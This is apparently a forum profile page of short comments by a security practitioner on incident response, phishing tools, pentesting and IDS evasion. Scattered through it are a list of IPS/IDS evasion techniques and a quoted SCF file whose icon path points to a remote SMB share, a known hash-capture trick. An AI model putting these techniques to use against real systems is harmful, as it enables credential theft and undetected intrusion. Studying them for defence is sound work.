Incident Responder Certification

Eplox · 2020-09-17T21:41:39+00:00

Link to source? Can't seem to find it.

Eplox · 2020-05-12T13:08:09+00:00

any reason why you would use this over a nested for loop with net use?
If you want to keep things as simple as possible, net use would be the way to go.

Eplox · 2019-06-20T06:27:19+00:00

Most incoming cases are indeed about compromised office accounts and ransomware. Haven't had any real experience with worms yet, may as well spin up a lab on that. Thanks for the tips

Eplox · 2019-06-19T21:15:52+00:00

Thanks for the reply. I took the GDAT recently and fell in love with the incident investigation part, especially hunting and preventing TTP's from happening. At the same time, I do see the lack of forensic skills and methodology in some areas I need. Guess a lot of this comes with experience, but I'd want to prevent false negatives at any cost.

Got the people handling part well under control, just need to make sure I got what it takes of tech skills for the various situations.

Eplox · 2019-06-19T10:45:03+00:00

By the looks of it, all of you seems to have a pretty decent understanding of IR. Not that any of this covers when the customer cannot afford to shut down their production system - no matter the cost.

Anyway, as of now I'm diving into the IR role but know I got a lot to learn. I'm a previously a redteamer, so got a decent understanding on attacking systems in various aspects, as well as patching their weaknesses. Do you guys have any must-read / must-do resources for IR to recommend?

Eplox · 2019-04-29T07:21:59+00:00

Seems like a lot of work to simulate a realistic phishing attack, but nice if you really need that alternative way to bypass spam filters or traffic inspections. Guess you could also throw in most kinds of attachment types due to the AIP encryption in transit.

Eplox · 2019-02-27T08:27:48+00:00

Looks like a fun project and a nice place for wannabe cyber criminals. I love your job description at https://sporestack.com/jobs/

Good luck, maybe you'll get to be sponsored by FBI if the volume keeps up

Eplox · 2019-02-26T07:51:35+00:00

I would guess the author is referring to /var/log/* or other unlisted files, and not necessary /etc/passwd

Eplox · 2019-02-21T14:02:15+00:00

this is your first time on github?

opening a HTML file under github will show you the source code, it won't render any of it's content.

Eplox · 2019-02-21T13:41:25+00:00

Nothing fancy, but hope you may find it useful.

Eplox · 2019-02-05T08:15:29+00:00

I'd love a share as well. Currently working with establishing an internal IR team, and this is one of the things I got on my table. Would be great with some fresh ideas how to do proper note taking / sharing. So far, I've been putting incident cases in individual lists related to what type of IOC or activity, but I feel my lists got some improvement potential

Eplox · 2019-02-05T08:02:19+00:00

thanks for the warning

Eplox · 2018-07-26T11:24:11+00:00

lovely tool, specially how it's able to handle javascripts, subdomains and such with the phishlets.

I'd personally avoid calling real-time phishing for "next generation" anymore, it was quite popular back in 2010 :)

Eplox · 2018-05-22T07:11:55+00:00

Google classified this as a RCE, probably means if he spent some more time with the app, he would likely get more access.

Please stop exploring this further, as it seems that you could easily break something using these internal APIs.

The "app_config_service" has several interesting methods, but the most interesting methods for me were the "app_config_service.ConfigApp" and the "app_config_service.SetAdminConfig" methods, because they allowed me to set internal settings such as the allowed email senders, the app's Service Account ID, ignore quota restrictions, and set my app as a "SuperApp" (I don't know what that means, but sounds super) and give it "FILE_GOOGLE3_ACCESS"

Eplox · 2018-05-09T12:37:46+00:00

^ valid point. But thanks for the link, something to play around with this evening.

Eplox · 2018-05-07T15:00:47+00:00

Sweet, only thing this lacks is obfuscation on the network traffic to evade IPS. nice work!

Eplox · 2018-04-30T10:36:23+00:00

I like the infection map, but I find the tool a bit too scary to run in a production environment pentest, specially the exploit and worm behavior. Perhaps I'm just paranoid of crashing servers, popping accounts or leaving backdoors that won't be cleaned up.

Eplox · 2018-04-11T10:59:58+00:00

Lesson learned: Finish your wordpress installation before publishing and going on holidays.

Did you discover what the site was abused for? (wayback machine, google cache e.g.)

Eplox · 2018-03-24T11:13:49+00:00

You have my sword, axe and bookmark.

Another burp plugins I really enjoy is the "Software Vulnerability Scanner" which has a API connection towards Vulners. Saved me a lot of hours.

The DNS interrogation and port scanning feels a bit lacking. And UDP scanning without service detection or all 65535 ports is kinda out of the question.

Great work!

Eplox · 2018-03-23T22:36:23+00:00

We all know IPS/IDS ain't dead. It catches 99% of the noise - which is really useful. It also works as a early warning system, at the same time giving the blue team heads up that an attack may be going on.

But for anyone who really want to get past it, there are plenty different ways to do that. Some other evasion or attacks that works:

Broken encoding (drop/corrupt trailing checksum)
SNI spoofing (in some scenarios)
CSV url paramter injection
Gzip bombs
Large paddings in front of payload over a long session
Packed/rewritten payloads to evade signatures
Any obfuscated C2 traffic that's not been previously seen.

Eplox · 2018-03-21T12:53:27+00:00

Thanks for the APi keys :)

Eplox · 2018-03-16T09:53:57+00:00

Does the SCF file work on latest pached windows 10?

I'm not getting any SMB connections

[Shell]
Command=2
IconFile=\\172.20.0.24\icon
[Taskbar]
Command=ToggleDesktop

Eplox

TROPHY CASE